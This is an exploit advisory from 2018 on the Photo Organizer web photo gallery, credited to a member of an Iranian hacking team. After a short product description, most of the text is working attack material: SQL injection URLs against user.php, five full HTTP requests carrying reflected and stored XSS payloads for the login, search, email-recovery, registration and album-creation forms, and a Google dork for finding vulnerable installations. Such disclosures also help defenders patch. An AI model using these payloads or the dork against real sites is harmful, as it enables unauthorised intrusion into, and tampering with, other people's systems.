facebook facebook twitter rss

Photo Organizer - XSS and SQL Vulnerabilities

Author: Rednofozi , Published: 10-09-2018
[+] Title                 :- Photo Organizer - XSS and SQL Vulnerabilities 
[+] Date :- 2018-09-10
[+] Exploit Author :- Rednofozi
[+] Vendor Homepage :- http://po.shaftnet.org/
[+] Version :- All Versions
[+] Software Link: :- http://po.shaftnet.org/#download
[+] Tested on :- Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- intext:"Powered by Photo Organizer"
[+] Team name :- Anonysec.org
[+] Official Website :- nadaram :d
[+] Contact :- Rednofozi@yahoo.com



=========================================================


########################################################

0x01# ~ Introduction
====================
At its most basic level, Photo Organizer is (yet another) a multiuser web-based photo gallery engine. It differentiates itself by focusing on asset management, aiming at the needs of professional photographers rather than the more typical “I need to share some images on the web and blog about it” crowd. It does not make the assumption that just because you have an image, you want to share it with someone. It combines “we'd like to show people some photos” with “we have a lot of photos we just store and annotate.”
To that end, Photo Organizer is highly scalable, capable of handling tens of thousands of images with ease. Coupled with robust importing, exporting, searching, tagging, and printing capabilities, it is intended to act as a photographer's primary image repository.

0x02# ~ Exploitation
====================

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0 [+] Boolean SQL Injection & Blind [+] 0
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

http://site.com/user.php?user=1 and 1=2
http://site.com/user.php?user=1 union select 1,2--
http://site.com/user.php?user=-1 OR 17-7=10

1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0 [+] Reflected XSS Cross Site Scripting [+] 0
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

Affected path(s):login.php
search.text.general.php
login.php?operation=get_email
register.php

========================== HTTP REQUEST XSS 1 ==============================
Host site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/login.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
POST: operation=login&username='"><img+src=x+onerror=prompt(1337);>&password=&auto_login=on&x=0&y=0

XSS Proof Image: http://i.imgur.com/VmbmuiZ.png
============================================================================


========================== HTTP REQUEST XSS 2 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/search.text.general.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
POST: search_string='"><script>alert('1337')</script>&search_type=¤t_user=all&x=0&y=0

XSS Proof Image: http://i.imgur.com/PDcO50Y.png
============================================================================


========================== HTTP REQUEST XSS 3 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/login.php?operation=get_email
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
POST: operation=send_info&email='"><script>alert('1337')</script>&x=0&y=0

XSS Proof Image: http://i.imgur.com/MFc5unu.png
============================================================================


========================== HTTP REQUEST XSS 4 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/register.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
POST: username='"><img+src=x+onerror=prompt(1337);>&password_1=&password_2=&first_name=&last_name=&email=&url=&phone=&company=&address1=&address2=&city=&zipcode=&state=null&country=null&x=0&y=0

XSS Proof Image: http://i.imgur.com/7T4WZMW.png
============================================================================


1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
0 [+] Persistent XSS Cross Site Scripting [+] 0
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1

Affected path(s):album.add.php?parent=

========================== HTTP REQUEST XSS 5 ==============================
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Referer: http://site.com/album.add.php?parent=
Cookie: po_session_id=701cc0e40cd083390368f49206b4ccbd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
POST: album_caption='"><script>alert('1337')</script>&parent=null&album_access_rights=3&album_description=&x=0&y=0

XSS Proof Image: http://i.imgur.com/TrzBqXJ.png
============================================================================

--------------------------------------------------------------------------------------------

#######################################################
Anonysec hacker iranin
########################################################

=======================================================
# Discovered by : Rednofozi


#--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow

Like us on Facebook :